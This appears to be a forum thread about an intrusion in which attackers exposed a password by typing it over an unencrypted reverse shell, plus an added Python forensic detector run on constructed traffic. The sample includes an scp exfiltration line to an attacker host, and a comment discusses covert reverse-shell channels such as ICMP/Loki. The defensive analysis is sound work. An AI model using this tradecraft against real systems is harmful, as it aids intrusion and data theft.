by kaivi 1577 days ago
Cool story, that does indeed sound like a plot out of a movie!

How were you able to extract a password from just listening to scp (ssh really) traffic though? Also, how did you know that someone's entire network was SSL MITM'd, only by looking at the data they dumped? Did the hackers store a readme file along with every dump?


The traffic containing the clear text password was not scp, it was the reverse shell they sent themselves. Reverse shells are unencrypted on the wire, and when scp prompted for the password, they typed it in over their reverse shell. A significant oversight on their part. If it was a team, it must have been a less experienced member who made that mistake.

As far as the SSL MITM goes, they indeed documented their attack with various files containing notes in English. They had a separate directory (within the target's folder) containing the certificates they were using in the attack.
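The leak described above, as an added example that is not from the original thread: a small forensic check in Python over a reconstructed, cleartext reverse-shell stream (constructed here) that flags interactive shell prompts and a credential typed in the clear after a password prompt, redacting the value itself. The host names, the 203.0.113.5 address and the keystrokes are constructed sample data.

```python
import re
from dataclasses import dataclass

# Constructed sample: a reassembled bidirectional TCP stream of a cleartext
# reverse shell. "out" is compromised host -> attacker (shell output),
# "in" is attacker -> compromised host (keystrokes).
SAMPLE_STREAM = [
    ("out", "www-data@web01:/var/www$ "),
    ("in", "scp dump.tar.gz ops@203.0.113.5:/loot/\n"),  # 203.0.113.5: documentation range
    ("out", "ops@203.0.113.5's password: "),
    ("in", "hunter2\n"),                                  # constructed secret
    ("out", "dump.tar.gz   100%  14MB  2.1MB/s   00:07\n"),
    ("out", "www-data@web01:/var/www$ "),
]

# bash-style user@host:path$ prompt at the end of an output chunk
PROMPT_RE = re.compile(r"[\w.-]+@[\w.-]+:[^$#]*[$#] $")
# ssh/scp-style password prompt at the end of an output chunk
PASSWORD_PROMPT_RE = re.compile(r"(?i)password\s*:\s*$")


@dataclass
class Finding:
    kind: str
    detail: str


def analyze_stream(stream):
    """Walk the stream in order and report cleartext shell activity.

    A password prompt in the outbound direction arms the detector; the next
    inbound chunk is then the typed secret, which is reported by length only.
    """
    findings = []
    awaiting_secret = False
    for direction, payload in stream:
        if direction == "out":
            if PROMPT_RE.search(payload):
                findings.append(Finding("interactive_shell", payload.strip()))
            if PASSWORD_PROMPT_RE.search(payload):
                awaiting_secret = True
                findings.append(Finding("credential_prompt", payload.strip()))
        elif direction == "in" and awaiting_secret:
            secret = payload.rstrip("\n")
            findings.append(Finding("credential_in_clear", f"{len(secret)} chars (redacted)"))
            awaiting_secret = False
    return findings


if __name__ == "__main__":
    for f in analyze_stream(SAMPLE_STREAM):
        print(f"{f.kind:20} {f.detail}")
```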

Can't help but imagine your www-data which spawned nc, and it seems too amateurish for a high profile hacker group. Makes it seem as if they've copy-pasted the first one-liner reverse shell found on Google. Even the Metasploit framework introduced payloads a while ago which do traffic encryption/obfuscation. Much more subtle reverse shells are used in the wild, where a compromised machine reaches out to the hacker's server once in a while and receives commands and dumps output, even over something like ICMP/Loki or Covert TCP.